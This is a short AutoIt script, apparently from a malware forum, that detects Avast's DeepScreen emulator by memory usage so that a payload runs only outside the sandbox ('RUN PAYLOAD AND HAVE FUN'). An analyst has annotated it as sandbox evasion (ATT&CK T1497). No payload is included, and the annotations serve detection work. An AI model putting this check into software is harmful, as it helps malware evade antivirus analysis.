Feliz Navidad !!!
;========================================================================
; Func sAvastDeepScreenCheck
; Detect if file is running under Avast DeepScreen emulator environment
; Bypass Avast DeepScreen Emulators by Memory Usage
; Author : M3
; Forum : http://indetectables.net/forum.php
; Usage : sAvastDeepScreenCheck()
; Release : 12/12/2016
; Tested under Win7 32 / Win10 x64
;========================================================================
; Driver: takes one memory reading for the current process and branches on it.
; Analyst note: this is an environment check of the kind catalogued as
; MITRE ATT&CK T1497 (Virtualization/Sandbox Evasion). The sample behaves
; differently depending on where it runs, so a clean verdict from a single
; emulated run is not evidence that the file is benign.

; Threshold the reading is compared against. sAvastDeepScreenCheck() divides
; its value by 1024, so this is presumably expressed in KB (roughly 100 MB),
; despite the "Bytes" in the variable name - confirm.
Local $sDeepScreenAllocatedBytes = 100000
Local $sCheck = sAvastDeepScreenCheck()
; A reading ABOVE the threshold is treated as "inside the emulator". That the
; emulator reports a larger footprint than a real host is the author's claim;
; nothing in this script verifies it.
If $sCheck > $sDeepScreenAllocatedBytes Then
; Flag 16 = stop-sign icon, last argument = 4 second timeout.
MsgBox(16 , "[ AVAST SANDBOX DETECTED ]" , "FILE IS RUNNING UNDER AVAST SANDBOX !!!" , 4)
Else
; Flag 64 = information icon. Only a message box is shown here; no payload is
; present in this listing. This is also the branch taken when the helper
; returns without a value or reads a zeroed structure (presumably both compare
; as 0 - confirm), i.e. a failed measurement is handled as "not emulated".
MsgBox(64 , "[ PROCESS UNDER SAFE ZONE ]" , "RUN PAYLOAD AND HAVE FUN !!!" , 4)
EndIf
; sAvastDeepScreenCheck
; Purpose : query the memory counters of the current process through
;           Psapi.dll!GetProcessMemoryInfo and return one of them / 1024.
; Params  : none.
; Returns : the "memorysize" field of the local structure divided by 1024.
;           A bare Return (no value) if the GetCurrentProcess DllCall sets @error.
; Analyst note: the observable behaviour is a process querying its OWN memory
; counters via kernel32!GetCurrentProcess + psapi!GetProcessMemoryInfo and then
; comparing the result with a constant. Those APIs are common in legitimate
; software, so the call pair alone is a weak signal; the comparison followed by
; divergent behaviour is what makes it an environment check.
Func sAvastDeepScreenCheck()
Local $sGetCurrentProcess , $sStructParams , $sStructMemoryCount , $sSizeStruct , $sStructGetPtr , $sGetMemoryInfo , $sGetMemoryUsage
; DllCall returns an array; element [0] holds the function's return value.
; The handle is declared with AutoIt's "hwnd" type in this call.
$sGetCurrentProcess = DllCall("kernel32.dll", "hwnd", "GetCurrentProcess")
If @error Then Return
$sGetCurrentProcess = $sGetCurrentProcess[0]
; Local buffer layout: two dwords followed by eight uints, of which only the
; third and fourth members are named.
; NOTE(review): by position, "memorysize" appears to line up with the
; WorkingSetSize member of PROCESS_MEMORY_COUNTERS (and "workingsetsize" with
; PeakWorkingSetSize) - confirm against the structure definition.
$sStructParams = "dword; dword; uint workingsetsize; uint memorysize; uint; uint; uint; uint; uint; uint"
$sStructMemoryCount = DllStructCreate($sStructParams)
$sSizeStruct = DllStructGetSize($sStructMemoryCount)
$sStructGetPtr = DllStructGetPtr($sStructMemoryCount)
; The call result is stored in $sGetMemoryInfo but never examined, and @error
; is not checked here: if the call fails, the next line still reads the
; structure as it was created.
$sGetMemoryInfo = DllCall("Psapi.dll", "int", "GetProcessMemoryInfo", "hwnd", $sGetCurrentProcess, "ptr", $sStructGetPtr, "int", $sSizeStruct)
; Scale the raw counter by 1024 (presumably bytes -> KB - confirm).
$sGetMemoryUsage = DllStructGetData($sStructMemoryCount, "memorysize") / 1024
Return $sGetMemoryUsage
EndFunc